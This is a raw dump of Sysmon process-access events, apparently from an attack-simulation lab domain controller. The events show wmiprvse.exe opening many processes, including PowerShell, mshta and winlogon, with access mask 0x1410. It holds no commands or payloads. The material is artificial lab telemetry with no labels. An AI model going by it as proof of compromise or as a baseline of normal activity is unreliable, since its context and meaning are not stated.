15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.773{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 